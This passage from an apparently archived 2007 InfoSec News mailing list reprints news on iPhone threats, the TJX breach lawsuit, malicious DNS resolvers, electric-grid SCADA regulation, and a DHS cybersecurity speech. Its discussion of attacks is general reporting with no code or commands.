keeping people out and not focus on why they're trying to get in." Senior writer Frank Munger may be reached at 342-6329. His e-mail is munger (at) knews.com. His blog, Atomic City Underground, is available online at http://blogs.knoxnews.com/knx/munger/ Copyright 2007, Knoxville News Sentinel Co. From alerts at infosecnews.org Wed Dec 12 00:13:04 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Report: iPhone to be target of hackers in 2008 Message-ID: http://www.macworld.com/news/2007/12/11/hackiphone/index.php By Jim Dalrymple Macworld.com December 11, 2007 The iPhone has been the target of many users who wanted to customize the way it looks and hackers who wanted to use the device on other wireless networks since it was released in June. However, Arbor Networks predicts the seriousness of attacks on the iPhone will increase in 2008. According to Arbors Security and Engineering Response Team (ASERT) the attacks will likely to be in the form of drive by attacks malware embedded into seemingly harmless information, images or other media that actually perform dangerous actions when rendered on the iPhones Web browser. With the scrutiny the iPhone has received since its launch earlier this year over network lock-in, ASERT believes that hackers will be enticed by the possibility of attacking Apple users and the opportunity to be the first to hack a new platform, the report said. Apple has been involved in an ongoing battle with hackers for months. While the hacks have not been malicious, the process of unlocking the phone and allowing it to work with networks other than AT&T has caused Apple to react. After hackers successfully unlocked the iPhone, Apple warned users that future updates might render those devices inoperable. Later that same week, Apple released an update that did, in fact, disable unlocked iPhones. From alerts at infosecnews.org Wed Dec 12 00:13:20 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] TJX Lawsuit Transferred Message-ID: http://online.wsj.com/article/SB119743288731823035.html By Joseph Pereira The Wall Street Journal December 12, 2007 BOSTON -- A lawsuit by a group of New England and Alabama banks against TJX Cos. over a data breach that resulted in the theft of millions of credit-card numbers was transferred to a Massachusetts state court by a federal judge. In his order yesterday, U.S. District Judge William G. Young denied the plaintiffs' request to sue as a class and ruled that without class-action status the case would no longer fall under federal jurisdiction. The decision underscores a problem litigants in electronic data-breach cases -- a relatively new phenomenon in the U.S. legal system -- will have to resolve to be granted financial relief for alleged damages. "It is very difficult to prove whether any particular fraud loss is connected to the particular data breach as opposed to some other source," said Kevin McGinty, a class-action defense expert in Boston who isn't involved in the TJX case. How a specific loss occurred would have to be investigated on an individual basis, he said, and "that's why the judge decertified the case." [...] From alerts at infosecnews.org Wed Dec 12 00:13:33 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] 'We're all at risk' of attack, cyber chief says Message-ID: http://www.govexec.com/story_page.cfm?articleid=38798 By Liza Porteus Viana Technology Daily December 11, 2007 NEW YORK -- Private industry and governments need to make cyber security a priority, no matter what the cost, in order to defeat hackers and terrorists and to keep operations running during a crisis, a federal official said here Tuesday. Private industry owns and operates more than 85 percent of the country's critical infrastructures. "That means the federal government cannot address these cyber threats alone," said Greg Garcia, the Homeland Security assistant secretary who heads the national cyber-security division. Garcia addressed the New York City Metro InfraGard Alliance blocks from the World Trade Center site attacked by terrorists Sept. 11, 2001. InfraGard is a partnership between the FBI, local law enforcement and the private sector aimed at protecting critical infrastructures, including technology systems. "You all know our adversaries will stop at nothing to destroy the infrastructures we all work so hard to protect. ... We're all at risk, we're all responsible. and there's much more we have to do to protect our critical systems," Garcia said. "New York is the world's financial nucleus. ... As Wall Street goes, so does the rest of the economy." About $5.5 trillion to $6 trillion runs through the U.S. financial system each day, including paycheck delivery and withdrawals from automatic teller machines. Still, Garcia said, large household-name companies are leaving their networks exposed to infiltration and data theft. The federal government relies heavily on organizations like InfraGard and information-sharing and analysis centers for specific economic sectors to force industry to take cyber precautions. He said that partnership is particularly important given that hackers are becoming more sophisticated, and that malicious codes and software are now sold cheaply over the Internet. Garcia said there is a $100 billion market for cyber crime -- more than the illegal drug market. From fiscal 2006 to fiscal 2007, the U.S. Computer Emergency Readiness Team handled more than 37,000 incidents, compared with about 24,000 in fiscal 2006. "Unfortunately, none of this is going to dissipate if we don't have the same level of coordination and organization our adversaries have against us," Garcia said. On the government side, the Homeland Security Department's Einstein network monitors systems for abnormalities or intrusions and circulates threat information within hours. Einstein is used by 13 agencies, but Garcia wants all to subscribe. "There's strength in numbers," the assistant secretary said. "Just like beat cops, out-of-the-ordinary events or activities can tip off cyber responders to potential trouble." Industry also needs to consider physical threats that could affect networks, such as a pandemic flu outbreak, Garcia said. Companies must ensure that their businesses can operate via telecommuting during a crisis and that their networks don't become bottlenecked, he said. They should boost network security ahead of time to ensure continuity of operations. If the businesses don't do this, Garcia said, "our economy -- in fact, our very way of life -- is going to be at stake." Garcia toured the city's wireless network operations and emergency management centers, and spoke with city leaders about how they are managing and securing communications systems designed to operate across jurisdictions. In March, the department will conduct an exercise to practice coordinated responses to simulated strings of cyber attacks affecting all levels of government and industry. From alerts at infosecnews.org Wed Dec 12 00:13:46 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Employees care little for corporate data Message-ID: http://www.techworld.com/security/news/index.cfm?newsID=10899 By Tom Jowitt Techworld 11 December 2007 Employees have a careless and even negligent attitude to corporate data and infrastructure, finds a survey from online backup service provider Databarracks. The survey of more than 100 UK office workers found that 84 percent of workers felt they could not do their job for more than half a day if they lost access to corporate data. Meanwhile, 43 percent of respondents said they could not cope for any period without access. Yet despite this obvious high dependency on access to corporate data, many staff have an apathetic attitude to their corporate infrastructure. More than half (57 percent) said they had at some point lost an office laptop, Blackberry or USB stick. It seems that the favourite places to lose these devices are in the pub, bar or restaurant. Nearly two thirds (63 percent) of respondents have accidentally deleted data on corporate networks, whilst 69 percent admitted to saving more than 10 important work files on their PCs alone (i.e. no backups), which could cause disruption if that for example the equipment was stolen or damaged. In an age where there is little loyalty in the business environment , either from the company to staff (or vice versa), it is perhaps no surprise then that nearly three quarters (77 percent) of respondents said they would save their mobile phone first, over their work PC, if both were on fire. Additionally, 77 percent said they stored personal content on their office network or PC, a trend that Databarracks feels increases the risk of malware and puts strain on corporate resources. And it seems that the green message is just not getting through to a segment of staff either, with 24 percent stating they never switched off their computer at the end of the day. Only 23 percent said they sometimes closed down. More than half (55 percent) also feel that their company is ill prepared for environmental disasters, with 55 percent feeling their company should plan better for floods etc. This survey is not the first to point out how ill-prepared some IT departments are for natural disasters. "This research paints a frightening picture for UK organisations," said Peter Groucutt, MD of Databarracks. "Almost every business, irrelevant of sector, is reliant on the information stored on its IT network to manage day-to-day operations." "This dependence makes it critical for organisations and their employees to protect their network information, yet our survey shows carelessness and even negligence among many respondents, who have a haphazard view of how corporate data should be handled," he added. It is perhaps hardly surprising then that the online backup provider advises that "more organisations have to start seriously considering secure online backup to protect themselves from unforeseen events." From alerts at infosecnews.org Wed Dec 12 00:14:01 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] DNS attack could signal Phishing 2.0 Message-ID: http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html By Robert McMillan IDG News Service December 11, 2007 Researchers at Google and the Georgia Institute of Technology are studying a virtually undetectable form of attack that quietly controls where victims go on the Internet. The study, set to be published in February, takes a close look at "open recursive" DNS servers, which are used to tell computers how to find each other on the Internet by translating domain names such as google.com into numerical IP addresses. Criminals are using these servers in combination with new attack techniques to develop a new generation of phishing attacks. The researchers estimate that there are 17 million open-recursive DNS servers on the Internet, the vast majority of which give accurate information. Unlike other DNS servers, open-recursive systems will answer all DNS lookup requests from any computer on the Internet, a feature that makes them particularly useful for hackers. Georgia Tech's and Google's researchers estimate that as many as 0.4 percent, or 68,000, open-recursive DNS servers are behaving maliciously, returning false answers to DNS queries. They also estimate that another 2 percent of them provide questionable results. Collectively, these servers are beginning to form a "second secret authority" for DNS that is undermining the trustworthiness of the Internet, the researchers warned. "This is a crime with few witnesses," said David Dagon, a researcher at Georgia Tech who co-authored the paper. "These hosts are like carnival barkers. No matter what you ask them, they'll happily direct you to the red light store, or to a Web server that does nothing more than spray your eyeballs with ads." Attacks on the DNS system are not new, and online criminals have been changing DNS settings in victim's computers for at least four years now, Dagon said. But only recently have the bad guys lined up the technology and expertise to reliably launch this particular type of attack in a more widespread way. While the first such attacks used computer viruses to make these changes, lately attackers have been relying on Web-based malware. Here's how an attack would work. A victim would visit a Web site or open a malicious attachment that would exploit a bug in his computer's software. Attackers would then change just one file in the Windows registry settings, telling the PC to go to the criminal's server for all DNS information. If the initial exploit code was not stopped by anti-virus software, the attack would give attackers virtually undetectable control over the computer. Once they'd changed the Windows settings, the criminals could take victims to the correct Web sites most of the time, but then suddenly redirect them to phishing sites whenever they wanted -- during an online banking session, for example. Because the attack is happening at the DNS level, anti-phishing software would not flag the phoney sites. Or an attacker could simply take complete control over the victim's Internet experience, Dagon said. "If you look up the address of a Christian Science Reading Room site, they'll point you to skin exotica," he said. "If you ask where Google.com is located, they'll point you to a machine in China selling luggage." "It's really the ultimate back door," said Chris Rouland, chief technology officer with IBM's Internet Security Systems division. "All the stuff we've deployed in the enterprise, it's not going to look for this." Rouland expects to see more of these DNS attacks launched from Web 2.0 sites in the coming months, because they make it very easy for people to "mash up" Web pages from many different sources -- some of which may be untrustworthy. "This is truly the next generation of phishing," he said. Preliminary findings by Dagon's team shows that the Web is an important vector for these attacks. Using Google's network of Web crawlers, researchers uncovered more than 2,100 Web pages that used exploit code to change the Windows registry of visitors. The team's paper, entitled Corrupted DNS Resolution Paths, is set to be published at the Network and Distributed System Security Symposium (NDSS) in San Diego. It is co-authored by Chris Lee and Wenke Lee, of Georgia Tech and Niels Provos, a senior engineer with Google. Last year Dagon and Wenke Lee, founded a startup called Damballa, which is developing ways to protect against these types of attacks. Damballa, which bills itself as an anti-botnet appliance vendor, can identify compromised machines by tracking whether or not they are communicating with DNS servers that are known to be malicious. From alerts at infosecnews.org Wed Dec 12 00:14:17 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Energy companies face costly upgrades to secure electric grid Message-ID: http://www.networkworld.com/news/2007/121007-energy-companies.html By Ellen Messmer Network World 12/11/07 In an effort to improve security in the nations electric power grid, the Washington-based Federal Energy Regulatory Commission is poised to issue new rules to compel energy companies to use practices such as patch management and strong authentication to secure their industrial control systems against attackers, sabotage and unauthorized use. If FERC at its Dec. 20 meeting approves the so-called Critical Infrastructure Protection (CIP) standards for physical and cybersecurity of the electric power grid, it will flip the switch on a regulatory regime where electric-power companies have to ensure the most critical parts of their system control and data-acquisition (SCADA) systems meet security requirements more associated with corporate computer best practices. But because many SCADA systems in place today to control the bulk-power grid may not be readily adapted for cybersecurity protection, IT managers at energy companies say they face the prospect of a wholesale replacement of their SCADA systems to meet regulatory goals. There are SCADA systems out there for forty or fifty years and theyre running fine, says Patrick Miller, chair of the electric-utility user group called Energy Security Northwest, whose membership hails from 20 utilities. The energy companies across the country, he says, expect the upcoming FERC decision to influence whether they will need to wholly replace SCADA systems to meet new security regulations. Some energy companies say it seems unavoidable. The almost 20-year-old control systems made by Televant Farradyne used by the Eugene Water & Electric Board in Oregon to throw switches and move power are going to be phased out, though replacements havent been selected yet, says senior security specialist Mark Ellister. This is ancient technology, you cant patch this, says Ellister. Power struggles To add to the anxiety, even as FERC prepares to establish new security rules for the electric power industry as it must under a Congressional law passed in 2005, its unclear whether the commission will adopt outright the eight CIP standards that were proposed last year by the organization called the North American Electric Reliability Corp. (NERC). FERC chose NERC to do the job of submitting standards and later start auditing for them and looking for possible violations, which could mean steep fines, over the next few years. Joseph McClelland, director of the newly formed Office of Electric Reliability at FERC, recently told Congress it may ask NERC to tighten the proposed standards, which as now written allow for some laxness in following them, especially if theyre not technically feasible for legacy equipment which cant be upgraded to meet cybersecurity requirements. If this equipment is left vulnerable, it could be the focal point of efforts to disrupt the grid, McClelland told Congress in October. In addition, the National Institute of Standards and Technology (NIST) is arguing that it should be the one setting the standards. NIST has clear authority to set security standards for both the business and SCADA systems in federally operated electric utilities such as the Tennessee Valley Authority and Bonneville Power Authority, notes Stuart Katzke, senior research scientist at NIST. The federal ones have to meet the NIST standards guidelines, says Katzke. They also have to meet FERCs regulations, whatever they will be. NIST wants FERC to approve NIST security guidelines for industrial controls, which are out for comment until mid-December. NIST says its proposed standards are tougher and better than the ones proposed by NERC. Where is SCADA security? Caught in the middle of this power struggle, the industrys IT managers say that many SCADA systems in use today, whether based on Windows, Unix or older proprietary operating systems, simply arent designed to accommodate processes like patch management in the round-the-clock operations of managing the nations power grid. Plus giant SCADA systems traditionally arent just swapped out. With SCADA, you do it with very small pieces over a very long period of time, Miller says. It runs the power grid. Miller says the older workhorse systems and even new equipment seldom meet the high expectations of the eight CIP standards under review by FERC, which may take a hard line in not allowing exceptions. Miller adds hes seen scant evidence that SCADA manufacturers, other than Schweitzer Engineering Laboratories, are seeking to adapt to the new security requirements. The American Public Power Association (APPA), the Washington-based trade association representing 2,000 publicly operated utilities, supports the security standards effort but hopes FERC will allow a technical feasibility exception for older equipment in substations and generating plants which is incompatible with certain cyber-security measures, including software updates and patches. Utilities should be able to take advantage of the useful life of existing equipment from a reliability standpoint, APPA said in its official comments to FERC. APPA also noted there are risks with using vendor patches as well as using software with a known flaw. Even NERC, whose executive vice president, David Wheatley, testified before Congress in October, expressed worry that promulgating standards for the bulk power system that draw too closely on the standards appropriate for secured business systems could result in a less reliable bulk-power system, either because of decreased operations or decreased security. Wheatleys testimony cited as examples how use of password-protected screen savers could block visibility of real-time operations that have to be constantly observed, or mistyped passwords could lock out access to operations controls. NERC declined to discuss this but said the Congressional testimony reflects its current views. Allen Mosher, APPAs senior director of policy analysis, said the security standards process is likely to be one that gets updated every three years or so, and the NIST proposals might get adopted over time. Whatever the outcome of the FERC security standard rule-making, there will be a lot at stake as NERC starts to do audits over the next two years or so and reports any security violations and noncompliance to FERC. Fines could be up to $1 million per day per violation, Mosher concluded. All contents copyright 1995-2007 Network World, Inc. From alerts at infosecnews.org Wed Dec 12 00:14:30 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Downing St responds to silicon.com's Full Disclosure campaign Message-ID: http://software.silicon.com/security/0,39024655,39169411,00.htm By Gemma Simpson Silicon.com December 2007 Organisations are to get guidance from data protection watchdog the Information Commissioner on notifying their customers of a security breach. The plans have been revealed by the government in response to silicon.com's Full Disclosure campaign [1], which calls for a review of the data breach notification laws in the UK. As part of the campaign silicon.com launched an online petition on the Downing Street website calling for the Prime Minister to improve the reporting of information security breaches in the public and private sectors. The e-petition received more than 300 signatures. The government said the move towards data breach notification laws in other jurisdictions - such as seen in the US - is an "interesting development", but said it is not convinced this would lead to better protection of data. But the response did not completely dismiss the notion of UK data breach legislation, and said: "The government does not discount the idea of a data breach law. However, it is not convinced that it would lead to an improvement in performance by business in regard to protecting personal information." Instead of a data breach law, the written response hinted towards a voluntary "checklist" that will offer companies guidance on what to do following a data breach. The response said: "The Information Commissioner's Office (ICO) acknowledges that there are occasions when notifying consumers of a breach of security might not be appropriate. The ICO plans to consider drafting some checklist guidance to organisations - similar to guidance that exists in Canada and New Zealand." The UK's data protection watchdog already published new guidelines for individuals to better understand how and why organisations use their data under the current Data Protection Act in August 2007. Downing Street's response to the silicon.com petition also said the government takes "the protection of personal data extremely seriously" and that the Data Protection Act sets out the framework for data protection and any enforcement action which may be taken by the Information Commissioner and the courts. In November, Prime Minister Gordon Brown gave the ICO the power to conduct spot checks on government departments, in light of the HM Revenue & Customs breach which saw 25 million child benefit claimants' details 'lost in the post' - making it the largest UK data breach in history. [1] http://www.silicon.com/publicsector/0,3800010403,39167826,00.htm From alerts at infosecnews.org Thu Dec 13 02:04:13 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Most in military believe a war with China will come Message-ID: http://www.taipeitimes.com/News/taiwan/archives/2007/12/13/2003392340 POLL: Lieutenant General Chen Kuo-hsiang said that the questionnaire was given to 3,010 soldiers who took part in an exercise after an `intensive mental training course' By Jimmy Chuang STAFF REPORTER Dec 13, 2007 More than 50 percent of military personnel believe there is going to be war between Taiwan and China -- numbers the Ministry of National Defense's General Political Warfare Bureau said yesterday were a good sign. "It shows that most of our personnel have not forgotten they face an enemy that needs to be dealt with. They would be ready for combat on the shortest possible notice," said Lieutenant General Chen Kuo-hsiang (???), director-general of the bureau. Chen made his remarks during a meeting at the legislature's National Defense Committee yesterday morning. Unveiling the results of a survey conducted earlier this year, the bureau said that 50.3 percent of military personnel who participated in the annual Han Kuang military exercise believed there will be a war between Taiwan and China sometime in the near future. Chen said the questionnaire was given to 3,010 soldiers who participated in the exercise following an "intensive mental training course." He refused to give any details about the course. "I can only say that based on the results, we have achieved what we set out to do," Chen said. "Reminding our soldiers of the existing threat and making sure everything is on track is in line with our goals. Obviously, the exercise and training were a success," he said. In addition to believing that war was imminent, 85.6 percent of respondents said they were always conscious of the possibility of information leaks or Chinese espionage occurring while they were on duty. Chen said the course was designed to help soldiers realize that Beijing is relentless in its military threat against Taiwan. "In addition to the constant reminder, the results also showed that 85.7 percent of our military personnel would do whatever it takes to perform their jobs under any circumstances," Chen said. This is a good sign," he said. From alerts at infosecnews.org Thu Dec 13 02:04:27 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] How to Wage Cyber War Message-ID: http://blog.wired.com/defense/2007/12/how-to-wage-cyb.html By Noah Shachtman Wired.com December 12, 2007 Pentagon types are spending God-knows-how-much to wage battle online. Brave New War [1] author John Robb [2] offers 'em some tips on how to put their dough to the best use [3] . Over the few years, the Defense Department has morphed the nuclear weaponeers of U.S. Strategic Command [4] into network warriors, and turned the 8th Air Force into a new "Cyberspace Command." Not to mention plowing countless billions into the National Security Agency [5] and all kinds of digital combat cadres [6], scattered throughout the armed services. And from the interviews I've done, at least, the roles and expectations for each of these agencies is, um, evolving, at best. Robb's advice, to his former Air Force colleagues now putting Cyberspace Command together: * Real-world experience and rapid (open source) innovation. Most, if not all, of this experience and innovation in cyberwarfare is gained through criminal activity. Innovation is a product of rapid cycles of competition with software vendors and computer security companies. * Massive self-replication. Think in term of small teams (the smarter, the better) designing software that seizes control of tens of millions of computer systems through various forms of infection. * Deniability. Nearly all of the successful operations conducted in offensive cyberwarfare will require deniability. Post-attack forensics must not point back to a government since these wars/battles will be fought in peacetime. "Given these requirements, Robb believes, "this new Command will likely fail (and badly)." It'll create public relations disasters -- and retreat into a largely defensive crouch. And once it does, it'll be outmaneuvered by countries willing to get in bed with online mafias. We'll see. [1] http://www.amazon.com/exec/obidos/ASIN/0471780790/c4iorg [2] http://globalguerrillas.typepad.com/ [3] http://globalguerrillas.typepad.com/globalguerrillas/2007/12/the-us-and-cybe.html [4] http://www.defenselink.mil/news/newsarticle.aspx?id=47605 [5] http://blog.wired.com/defense/2007/09/nsa-targets-hac.html [6] http://blog.wired.com/defense/2007/10/also-nsa-target.html From alerts at infosecnews.org Thu Dec 13 02:04:54 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Remarks of Assistant Secretary of Cybersecurity and Communications Greg Garcia at the New York Metro Infragard Alliance Security Summit Message-ID: http://www.dhs.gov/xnews/releases/pr_1197409593155.shtm Release Date: December 11, 2007 New York, NY (Remarks as prepared) New York is such a fitting place to hold a security summit. With its storied history and thousands of financial institutions, it is the world's financial nucleus. All of you, as leaders in your respective companies and organizations, understand the full weight of your responsibilities to New York City itself, the nation, and quite honestly, the world. Because as Wall Street goes, so does the rest of the world. That is quite a responsibility to shoulder. Yet you have continuously demonstrated your understanding and commitment to upholding this reputation. Time and again, whether facing a natural disaster or terrorist attack, you have found ways to ensure that roughly five and a half trillion dollars flows unabated through our financial systems each and every day. That's five and a half trillion dollars a day in activities that are critical to our citizens' basic needs and our Nation's economy. It's the delivery of paychecks, utility bill payments, ATM withdrawals, and the over $733 million of Internet sales that occurred this past cyber Monday -- the first Monday after Thanksgiving, which is considered the most active online shopping day of the year. As New Yorkers know, our adversaries will stop at nothing to destroy the infrastructures we have all worked so hard to build and protect. Whether they are cyber criminals, hacktivists, or nation states, our adversaries are pursuing ever more sophisticated and determined cyber attacks on U.S. government and private sector networks. I'm watching as companies ? household names with huge market capitalization and seemingly tremendous resources ? expose their networks and data to infiltration and information theft. I'm seeing the same with government agencies on a regular basis. So we're all at risk, and we're all responsible. We have made some progress but there is much more we all have to do to protect our critical systems. So let me tell you what we're doing at DHS to make the United States the most difficult and dangerous place in the world to conduct cyber crime. I think you will see that you each have a very important role to play in helping to make this happen. Let me start with an overview of the threats as we see them at DHS. As you all know, the threats are real. Hackers are becoming more sophisticated and focused in their efforts. Criminal computer code is now written at the PhD level, and sold cheaply on the Internet. Hackers are making massive efforts to compromise computer systems on a global scale. What was once a nuisance committed by various individuals years ago has now progressed into organized efforts by highly skilled professionals. Today's professional hackers develop and sell malware toolkits to other criminals on the black market. In turn, the buyers of these toolkits can conduct online scams and spread malware more proficiently than ever before. Why do they do this? Because cyber crime is big business. The number of hackers attacking banks worldwide jumped 81 percent over the past year. Botnets, spear phishing, key loggers, and other attacks make up the more-than-$100 billion global market for cyber-crime ?? surpassing drug trafficking from a monetary perspective. Worst of all, the money obtained through cyber crime can be used to finance terrorism. The numbers don't lie. From October 1, 2006, through September 30, 2007, our US-CERT? which I'll describe in more detail in a moment?handled more than 37,000 incidents, compared with almost 24,000 the year before. This increase can be attributed to not only more attacks on our public and private networks, but also better situational awareness levels and reporting rates. I'll tell you now: many of these malicious attacks are designed to steal information and disrupt, deny access to, degrade or destroy critical federal or private sector information systems. Our adversaries are also seeking our intellectual capital and proprietary information, which we have spent years? and billions of dollars?developing. Unfortunately, none of this will dissipate if we do not have the same level of organization and coordination that our adversaries are using against us. This dynamic underscores the absolute necessity for IT security and the importance of a nationwide call to secure cyberspace. It's something we can't afford not to do. Our mission is clear. Securing the systems that maintain and operate critical infrastructures is vital to national security, public safety, and economic prosperity. How do we do this? Collaboration and information sharing. It's a common theme in many of the speeches you hear because public/private partnerships, like InfraGard and the Financial Services and Multi-State Information Sharing and Analysis Centers (ISACs), are essential to protecting our critical infrastructures. Let's be realistic. Private industry owns and operates more than 85 percent of the United States' critical infrastructures. That means the Federal Government cannot address cyber threats alone. Obviously, if a cyber attack occurs, the larger percentage of potential immediate victims will also be in the private sector. This includes the financial services industry. So not only does it make sense to collaborate with each other, it is an absolute necessity. At DHS, one of our best information sharing mechanisms is the United States Computer Emergency Readiness Team, or US-CERT. The nation's cyber watch and warning center, US-CERT coordinates the defense against and response to cyber attacks in coordination with the private sector. It also analyzes and reduces cyber threats and vulnerabilities, disseminates cyber threat warning information, and manages incident response activities with a wide range of stakeholders. US-CERT's activities allow us to see potential trends and coordinate appropriate deterrence and response activities across sectors. A prime example of this occurred just last month when the US-CERT served as the key data gathering and distribution center for a potential cyber threat to both government and private sector systems maintaining critical infrastructures. By taking advantage of its information-sharing relationships, US-CERT distributed a notice defining the malicious activity and addressing how partners could detect and prevent it from affecting their networks. This directly strengthened the security and resilience of our nation's critical infrastructures. The key lesson here is that by sharing our knowledge, we can better protect our nation. But we also know that this information sharing relationship is not as mature yet as it can be. The feedback we received from our private sector partners after this information notice was, overall, very positive and appreciative. But it included a reminder that such notices would be more useful if DHS could provide more threat-based context ? that is, what is the nature of these attacks? Where do they come from? What is their intent? Well, we continue to be limited in what we can share with partners who don't have appropriate security clearances, (indeed that's an issue within the U.S. government agencies as well). And we have to find better, quicker ways to get you relevant information that you can act on. And, from our perspective, when we provide you information you already have, we realize both sides need to better calibrate our exchange of information so we make most effective use of our limited time and resources. So we're learning, and we're working to improve our information sharing. That's one of InfraGard's key tenets and the ultimate goal for all our actions. As we move into the discussion portion of this event, I'm very interested to hear your ideas about other ways we can share useful and relevant information between sectors. In addition to sharing information with its public and private partners, one of US-CERT's most important responsibilities is increasing the Federal Government's awareness of its own network activity. We know from our friends in law enforcement that situational awareness is the primary method a beat cop uses to protect a neighborhood. As I'm sure Joe can recall from his days on the force, a veteran officer works to deter crime wherever possible and catches criminals by understanding their environment, watching for trends and patterns, and knowing the rhythms of the community. We know the same is true for cyber first responders. So we created an early warning system that watches for malicious patterns in network traffic and notes irregular activity. Just as in neighborhood policing, out-of-the-ordinary events or activities can tip off agency cyber responders to potential trouble. EINSTEIN, as it is known, is that early warning system. It monitors participating agencies' network gateways for traffic patterns that indicate the presence of computer worms or other unwanted traffic. By collecting this information, EINSTEIN gives our analysts a big-picture view of potentially malicious activity on federal networks. Prior to EINSTEIN, it took cyber security responders four to five days to gather and share critical data on federal government computer security risks. Today, we can produce that information in as little as four to five hours. By analyzing network traffic for potential cyber threats before they can exploit vulnerabilities, EINSTEIN makes it more difficult, more time consuming, and more expensive for cyber criminals to reach and impact their intended targets. EINSTEIN provides us with unique traffic pattern analysis that US-CERT, as appropriate, can share with its partners. Now another program that exemplifies knowledge sharing in action is the National Vulnerability Database. Sponsored by my office and the National Institute of Standards and Technology (NIST), the National Vulnerability Database or NVD puts the more than 28,000 known cyber security vulnerabilities into a single publicly available resource. NIST analysts then score them according to the severity of their risk. Accessed at a rate of 48 million hits a year, the NVD's data enables all organizations to automate their vulnerability management, security measurement, and compliance activities through a series of security checklists and metrics. Recently, your colleagues in the payment card industry recognized the value of the database to their cyber risk management efforts. Last June, the industry's data security standards required that all credit card processing vendors use the National Vulnerability Database to evaluate the security of their payment systems. Essentially, it says that vendors must ensure that their systems do not include vulnerabilities that score higher than a pre-determined NVD number. This greatly enhances the security of every credit card transaction, prevents disruptions of key operating systems, and protects consumer information. The value of the NVD is not limited to the credit card processing industry. If you haven't investigated the potential beneficial uses of this program in your companies, I strongly encourage you to do so immediately. You can access it by going to US-CERT's homepage (www.USCERT.gov) and searching for ?NVD.? The NVD is a wonderful example of an industry-lead adoption of a valuable government tool. And it also underscores our role in the federal government, to provide resources that help all of you do your jobs more effectively. Let's move to another example of collaboration and information sharing. You know, in many ways, the enemy is already at the gate. So if we are going to secure cyberspace, we must marshal our defenses, learn from each other, and work together as never before. I'm a true believer in the phrase, ?you play how you train.? This is why exercises are critical to our national and financial security. InfraGard members already understand this. The Vermont InfraGard is a key planner in the state of Vermont's first ever cyber exercise, which my office is helping to design and implement. The lessons learned from next month's exercise will aid in the development of a cyber annex to the state of Vermont's emergency operations plan. At the national level, we are actively planning for the March 2008 national cyber exercise, Cyber Storm II, which follows the highly successful cyber storm I held in February 2006. This exercise examines our response and coordination mechanisms against a simulated cyber event affecting international, federal, state, and local governments, and the private sector. By organizing and executing an exercise such as cyber storm, DHS is able to test our planning, information sharing and response to attack scenarios, assess our strengths and weaknesses in those areas, and learn how to improve response capabilities. I am thrilled that the financial services sector, through the financial services ISAC, is once again fully engaged in the planning and execution of the cyber storm exercise. Their participation in the exercise demonstrates their firm commitment to cyber preparedness and I hope sends a signal to other sectors that cyber security measures need to be taken seriously. Throughout the country, at every level of government and within the private sector, people are dedicating themselves to ending cyber crime. To do this at CS&C it's necessary for my office to engage in robust collaboration and information sharing with our law enforcement partners. We do this through a liaison office in the US-CERT, which houses liaison officers from the U.S. Secret Service and FBI. For example, maintaining the necessary division of authorities, US-CERT and the FBI worked closely together to identify and investigate cyber criminals and threats during Operation Bot Roast II. An ongoing and coordinated initiative, Operation Bot Roast finds and captures the criminals that overtake people's computers to conduct criminal activities. Since it began last June, the FBI, with US-CERT's technical input, captured eight individuals responsible for infecting over one million compromised computers. We estimate the economic loss to be at more than $20 million to date. As the investigation continues, I have no doubt those numbers will increase. At DHS, we know that online payment systems are profitable money makers for criminals. A recent 24-month Secret Service investigation of e-gold, an online payment system favored by criminals, resulted in the seizure of over $16 million. In Miami, a Secret Service's cyber crime fraud investigation recovered more than 200,000 stolen credit card account numbers at a potential loss exceeding $75 million. And here in New York, a Secret Service investigation with the Manhattan District Attorney's office led to the indictment of 17 people and a company called Western Express, a digital currency transmittal service. The defendants are facing charges related to global trafficking in stolen credit card numbers, cyber crime, and identity theft. Based on the over 1.3 terabytes of digital evidence it obtained from search warrants and subpoenas, the Secret Service estimates that approximately $15 million flowed through Western Express' digital currency accounts. Additional judicial action is ongoing with respect to targets identified overseas. We're starting to really hurt the criminals. Eventually, they are going to realize that it is just too expensive ? both financially and in potential jail time ? to ?conduct business? in the United States. In addition to catching the criminals, my office also works closely with the Departments of Justice and Defense to prepare for and, if necessary, respond to a national-level cyber incident. As co-chairs of the National Cyber Response Coordination Group (NCRCG), we work with 19 different federal agencies, including the FBI and the Secret Service, to ensure that the full range and weight of the Federal Government's cyber capabilities are deployed in a coordinated and effective fashion. For example, the NCRCG recently convened to address and respond to the denial of service attack against the government of Estonia, a NATO ally. Additionally, the NCRCG will be an active participant in Cyber Storm II. Effective cyber and communications risk management requires us to be prepared for a national crisis beyond those caused by terrorists or criminals. Now, I've talked a lot about cyber viruses. But we still have to contend with the more traditional biological virus ? that is, the potential effects of a public health crisis, such as an outbreak of pandemic flu. The spread of pandemic disease across the U.S. will be rapid and unpredictable. We estimate that as much as 40 percent of the workforce will be unable to report to work during peak periods of an outbreak ? and you don't get to pick which 40 percent that could be. Naturally, telecommuting will be a key mechanism to keeping our businesses and government operational during a pandemic flu. Preparing for the increase in telecommuting is a demonstration of public-private collaboration in action. A working group led by my one of my components? the National Communications System?and including experts from the Federal Reserve Board, the Department of the Treasury, the Financial and Banking Information Infrastructure Committee, and the Financial Services Sector Coordinating Council, meets monthly to plan for the potential communications consequences of a pandemic influenza. What the working group found is that, while the telecommunications backbone is unlikely to experience congestion, the so-called last mile ? to the home and the enterprise ? could experience disruptive congestion. But it concluded that this disruption could be mitigated if certain safeguards and practices are implemented by enterprises and telecommuters. In collaboration with major internet service providers (ISPs), telecommunications carriers, and equipment and service vendors, the working group developed the following best practices that we strongly encourage businesses and government agencies to consider: 